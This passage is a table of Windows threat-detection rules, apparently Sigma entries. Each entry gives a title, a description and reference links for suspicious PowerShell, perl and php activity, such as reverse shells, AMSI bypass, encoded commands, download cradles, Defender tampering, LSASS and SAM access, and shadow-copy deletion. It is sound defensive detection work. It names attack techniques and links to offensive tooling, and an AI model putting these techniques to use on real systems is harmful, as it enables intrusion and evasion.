https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md, https://www.pdq.com/pdq-deploy/ |
Potentially Suspicious Execution Of PDQDeployRunner |
Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines |
https://twitter.com/malmoeb/status/1550483085472432128 |
Perl Inline Command Execution |
Detects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code. |
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/ |
Php Inline Command Execution |
Detects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code. |
https://www.php.net/manual/en/features.commandline.php, https://www.revshells.com/, https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet |
Ping Hex IP |
Detects a ping command that uses a hex encoded IP address |
https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna, https://twitter.com/vysecurity/status/977198418354491392 |
PktMon.EXE Execution |
Detects execution of PktMon, a tool that captures network packets. |
https://lolbas-project.github.io/lolbas/Binaries/Pktmon/ |
Suspicious Plink Port Forwarding |
Detects suspicious Plink tunnel port forwarding to a local port |
https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/, https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d |
Potential RDP Tunneling Via Plink |
Execution of plink to perform data exfiltration and tunneling |
https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/ |
Suspicious Powercfg Execution To Change Lock Screen Timeout |
Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout |
https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html, https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options |
AADInternals PowerShell Cmdlets Execution - ProccessCreation |
Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365. |
https://o365blog.com/aadinternals/, https://github.com/Gerenios/AADInternals |
Potential Active Directory Enumeration Using AD Module - ProcCreation |
Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration. |
https://github.com/samratashok/ADModule, https://twitter.com/cyb3rops/status/1617108657166061568?s=20, https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges |
Add Windows Capability Via PowerShell Cmdlet |
Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others. |
https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell, https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content |
Potential AMSI Bypass Via .NET Reflection |
Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning |
https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/, https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ |
Potential AMSI Bypass Using NULL Bits |
Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities |
https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi |
Audio Capture via PowerShell |
Detects audio capture via PowerShell Cmdlet. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md, https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html, https://github.com/frgnca/AudioDeviceCmdlets |
Suspicious Encoded PowerShell Command Line |
Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet) |
https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e |
Suspicious PowerShell Encoded Command Patterns |
Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains |
https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/ |
Suspicious Obfuscated PowerShell Code |
Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines |
https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/ |
PowerShell Base64 Encoded FromBase64String Cmdlet |
Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line |
Internal Research |
Malicious Base64 Encoded PowerShell Keywords in Command Lines |
Detects base64 encoded strings used in hidden malicious PowerShell command lines |
http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/ |
PowerShell Base64 Encoded IEX Cmdlet |
Detects usage of a base64 encoded "IEX" cmdlet in a process command line |
Internal Research |
PowerShell Base64 Encoded Invoke Keyword |
Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls |
https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ |
Powershell Base64 Encoded MpPreference Cmdlet |
Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV |
https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://twitter.com/AdamTheAnalyst/status/1483497517119590403 |
PowerShell Base64 Encoded Reflective Assembly Load |
Detects base64 encoded .NET reflective loading of Assembly |
https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar, https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ |
Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call |
Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly" |
https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar, https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/, https://learn.microsoft.com/en-us/dotnet/api/system.appdomain.load?view=net-7.0 |
Potential Process Execution Proxy Via CL_Invocation.ps1 |
Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process" |
https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/, https://twitter.com/bohops/status/948061991012327424 |
PowerShell Base64 Encoded WMI Classes |
Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc. |
https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar |
Assembly Loading Via CL_LoadAssembly.ps1 |
Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls. |
https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/, https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/ |
Potential Script Proxy Execution Via CL_Mutexverifiers.ps1 |
Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands |
https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/ |
Potential PowerShell Obfuscation Via Reversed Commands |
Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers |
https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/, https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66 |
ConvertTo-SecureString Cmdlet Usage Via CommandLine |
Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.3#examples |
Potential PowerShell Command Line Obfuscation |
Detects the PowerShell command lines with special characters |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64 |
Computer Discovery And Export Via Get-ADComputer Cmdlet |
Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file |
http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/, https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf |
New Service Creation Using PowerShell |
Detects the creation of a new service using powershell. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md |
Gzip Archive Decode Via PowerShell |
Detects attempts of decoding encoded Gzip archives via PowerShell. |
https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution |
PowerShell Execution With Potential Decryption Capabilities |
Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware. |
https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/ |
Powershell Defender Disable Scan Feature |
Detects requests to disable Microsoft Defender features using PowerShell commands |
https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps, https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE, https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files |
Powershell Defender Exclusion |
Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets |
https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://twitter.com/AdamTheAnalyst/status/1483497517119590403 |
Disable Windows Defender AV Security Monitoring |
Detects attackers attempting to disable Windows Defender using Powershell |
https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/, https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md |
Windows Firewall Disabled via PowerShell |
Detects attempts to disable the Windows Firewall using PowerShell |
https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html |
Potential PowerShell Downgrade Attack |
Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 |
http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/, https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade- |
Disabled IE Security Features |
Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features |
https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/ |
Potential COM Objects Download Cradles Usage - Process Creation |
Detects usage of COM objects that can be abused to download files in PowerShell by CLSID |
https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0, https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57 |
PowerShell Web Download |
Detects suspicious ways to download files or content using PowerShell |
https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd |
Obfuscated PowerShell OneLiner Execution |
Detects the execution of a specific OneLiner to download and execute powershell modules in memory. |
https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/, https://gist.github.com/mgeeky/3b11169ab77a7de354f4111aa2f0df38 |
Potential DLL File Download Via PowerShell Invoke-WebRequest |
Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet |
https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution |
PowerShell Download and Execution Cradles |
Detects PowerShell download and execution cradles. |
https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd, https://labs.withsecure.com/publications/fin7-target-veeam-servers |
PowerShell Download Pattern |
Detects a Powershell process that contains download commands in its command line string |
https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html, https://lab52.io/blog/winter-vivern-all-summer/, https://hatching.io/blog/powershell-analysis/ |
Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE |
Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe |
https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/, https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 |
DSInternals Suspicious PowerShell Cmdlets |
Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.
The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
|
https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.PowerShell/DSInternals.psd1 |
Email Exifiltration Via Powershell |
Detects email exfiltration via powershell cmdlets |
https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/, https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml |
Potential Suspicious Windows Feature Enabled - ProcCreation |
Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool.
Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
|
https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps, https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system, https://learn.microsoft.com/en-us/windows/wsl/install-on-server |
Suspicious Execution of Powershell with Base64 |
Commandline to launch powershell with a base64 payload |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets, https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/, https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/ |
Potential Encoded PowerShell Patterns In CommandLine |
Detects specific combinations of encoding methods in PowerShell via the commandline |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65 |
Powershell Inline Execution From A File |
Detects inline execution of PowerShell code from a file |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50 |
Certificate Exported Via PowerShell |
Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines. |
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a, https://learn.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate?view=windowsserver2022-ps, https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html |
Base64 Encoded PowerShell Command Detected |
Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string |
https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 |
Suspicious FromBase64String Usage On Gzip Archive - Process Creation |
Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward. |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43 |
PowerShell Get-Process LSASS |
Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity |
https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211 |
Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet |
Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet |
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ |
PowerShell Get-Clipboard Cmdlet Via CLI |
Detects usage of the 'Get-Clipboard' cmdlet via CLI |
https://github.com/OTRF/detection-hackathon-apt29/issues/16, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md |
Abuse of Service Permissions to Hide Services Via Set-Service |
Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) |
https://twitter.com/Alh4zr3d/status/1580925761996828672, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2 |
Suspicious PowerShell IEX Execution Patterns |
Detects suspicious ways to run Invoke-Execution using IEX alias |
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2, https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 |
Root Certificate Installed From Susp Locations |
Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. |
https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/, https://learn.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps |
Import PowerShell Modules From Suspicious Directories - ProcCreation |
Detects powershell scripts that import modules from suspicious directories |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md |
Unsigned AppX Installation Attempt Using Add-AppxPackage |
Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages |
https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package, https://twitter.com/WindowsDocs/status/1620078135080325122 |
Suspicious PowerShell Invocations - Specific - ProcessCreation |
Detects suspicious PowerShell invocation command parameters |
Internal Research |
Suspicious Invoke-WebRequest Execution With DirectIP |
Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access |
https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software |
Suspicious Invoke-WebRequest Execution |
Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location |
https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/ |
Suspicious PowerShell Mailbox Export to Share |
Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations |
https://youtu.be/5mqid-7zp8k?t=2481, https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html, https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1, https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/ |
Malicious PowerShell Commandlets - ProcessCreation |
Detects Commandlet names from well-known PowerShell exploitation frameworks |
https://adsecurity.org/?p=2921, https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries, https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1, https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1, https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1, https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1, https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/, https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/, https://github.com/calebstewart/CVE-2021-1675, https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1, https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html, https://github.com/HarmJ0y/DAMP, https://github.com/samratashok/nishang, https://github.com/DarkCoderSc/PowerRunAsSystem/, https://github.com/besimorhino/powercat, https://github.com/Kevin-Robertson/Powermad, https://github.com/adrecon/ADRecon, https://github.com/adrecon/AzureADRecon |
MSExchange Transport Agent Installation |
Detects the Installation of a Exchange Transport Agent |
https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7 |
Non Interactive PowerShell Process Spawned |
Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent. |
https://web.archive.org/web/20200925032237/https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html |
Potential PowerShell Obfuscation Via WCHAR |
Detects suspicious encoded character syntax often used for defense evasion |
https://twitter.com/0gtweet/status/1281103918693482496 |
Execution of Powershell Script in Public Folder |
This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder |
https://www.mandiant.com/resources/evolution-of-fin7 |
Tamper Windows Defender Remove-MpPreference |
Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet |
https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088 |
RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses |
Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 |
Potential Powershell ReverseShell Connection |
Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other. |
https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/, https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/, https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1 |
Run PowerShell Script from ADS |
Detects PowerShell script execution from Alternate Data Stream (ADS) |
https://github.com/p0shkatz/Get-ADS/blob/1c3a3562e713c254edce1995a7d9879c687c7473/Get-ADS.ps1 |
Run PowerShell Script from Redirected Input Stream |
Detects PowerShell script execution via input stream redirect |
https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml, https://twitter.com/Moriarty_Meng/status/984380793383370752 |
PowerShell SAM Copy |
Detects suspicious PowerShell scripts accessing SAM hives |
https://twitter.com/splinter_code/status/1420546784250769408 |
Suspicious Service DACL Modification Via Set-Service Cmdlet |
Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable |
https://www.sans.org/blog/red-team-tactics-hiding-windows-services/, https://learn.microsoft.com/pt-br/windows/win32/secauthz/sid-strings |
Suspicious PowerShell Invocation From Script Engines |
Detects suspicious powershell invocations from interpreters or unusual programs |
https://www.securitynewspaper.com/2017/03/20/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/ |
PowerShell Set-Acl On Windows Folder |
Detects PowerShell scripts to set the ACL to a file in the Windows folder |
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1, https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md |
Change PowerShell Policies to an Insecure Level |
Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag. |
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.4, https://adsecurity.org/?p=2604, https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/ |
PowerShell Script Change Permission Via Set-Acl |
Detects PowerShell execution to set the ACL of a file or a folder |
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1, https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md |
Service StartupType Change Via PowerShell Set-Service |
Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual" |
https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 |
Deletion of Volume Shadow Copies via WMI with PowerShell |
Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell, https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html |
Exchange PowerShell Snap-Ins Usage |
Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27 |
https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/, https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/, https://www.intrinsec.com/apt27-analysis/ |
Stop Windows Service Via PowerShell Stop-Service |
Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service" |
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/stop-service?view=powershell-7.4 |
Suspicious PowerShell Download and Execute Pattern |
Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive) |
https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70, https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html |
Suspicious PowerShell Parameter Substring |
Detects suspicious PowerShell invocation with a parameter substring |
http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier |
Suspicious PowerShell Parent Process |
Detects a suspicious or uncommon parent processes of PowerShell |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26 |
PowerShell Script Run in AppData |
Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder |
https://twitter.com/JohnLaTwC/status/1082851155481288706, https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03 |
Powershell Token Obfuscation - Process Creation |
Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation |
https://github.com/danielbohannon/Invoke-Obfuscation |
PowerShell DownloadFile |
Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line |
https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html |
User Discovery And Export Via Get-ADUser Cmdlet |
Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file |
http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ |
Net WebClient Casing Anomalies |
Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques |
https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/ |
Suspicious X509Enrollment - Process Creation |
Detect use of X509Enrollment |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42, https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41, https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115 |
Suspicious XOR Encoded PowerShell Command |
Detects presence of a potentially xor encoded powershell command |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65, https://redcanary.com/blog/yellow-cockatoo/, https://zero2auto.com/2020/05/19/netwalker-re/, https://mez0.cc/posts/cobaltstrike-powershell-exec/ |
Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet |
Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.
An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a |
